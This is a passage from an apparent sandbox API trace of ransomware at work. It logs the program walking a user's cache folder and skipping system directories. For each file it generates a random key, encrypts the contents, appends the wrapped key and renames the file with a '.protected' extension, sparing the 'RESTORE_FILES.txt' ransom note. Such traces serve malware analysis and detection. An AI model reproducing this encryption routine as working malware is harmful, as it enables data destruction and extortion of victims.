halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.protected")) returned 1 [0089.078] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Windows") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files (x86)") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="$Recycle.bin") returned 1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="System Volume Information") returned -1 [0089.078] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.078] StrStrIW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".protected") returned 0x0 [0089.078] lstrcmpW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="RESTORE_FILES.txt") returned -1 [0089.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: 
pbBuffer=0x295e76c) returned 1 [0089.079] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".rar") returned 0x0 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".zip") returned 0x0 [0089.079] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 
[0089.080] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.080] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.080] CloseHandle (hObject=0x150) returned 1 [0089.080] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected") returned 162 [0089.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.protected")) returned 1 [0089.081] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Windows") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files (x86)") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="$Recycle.bin") returned 1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="System Volume Information") returned -1 [0089.081] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".protected") returned 0x0 [0089.081] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="RESTORE_FILES.txt") returned -1 [0089.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".rar") returned 0x0 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.082] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".zip") returned 0x0 [0089.082] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.082] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.082] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.082] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.082] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.083] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.083] CloseHandle (hObject=0x150) returned 1 [0089.083] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected") returned 162 [0089.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.protected")) returned 1 [0089.083] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.083] lstrcmpiW 
(lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Windows") returned -1 [0089.083] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files") returned -1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files (x86)") returned -1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="$Recycle.bin") returned 1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="System Volume Information") returned -1 [0089.084] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".protected") returned 0x0 [0089.084] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="RESTORE_FILES.txt") returned -1 [0089.084] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.084] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".rar") returned 0x0 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".zip") returned 0x0 [0089.084] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.085] CloseHandle (hObject=0x150) returned 1 [0089.085] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected") returned 162 [0089.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.protected")) returned 1 [0089.086] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Windows") returned -1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files") returned -1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files (x86)") returned -1 [0089.086] 
lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="$Recycle.bin") returned 1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="System Volume Information") returned -1 [0089.086] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.086] StrStrIW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".protected") returned 0x0 [0089.086] lstrcmpW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="RESTORE_FILES.txt") returned -1 [0089.086] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.086] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") 
returned 0x0 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".rar") returned 0x0 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".zip") returned 0x0 [0089.087] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0089.088] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0089.088] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.089] CloseHandle (hObject=0x150) returned 1 [0089.089] 
wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected") returned 162 [0089.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.protected")) returned 1 [0089.130] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Windows") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files (x86)") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", 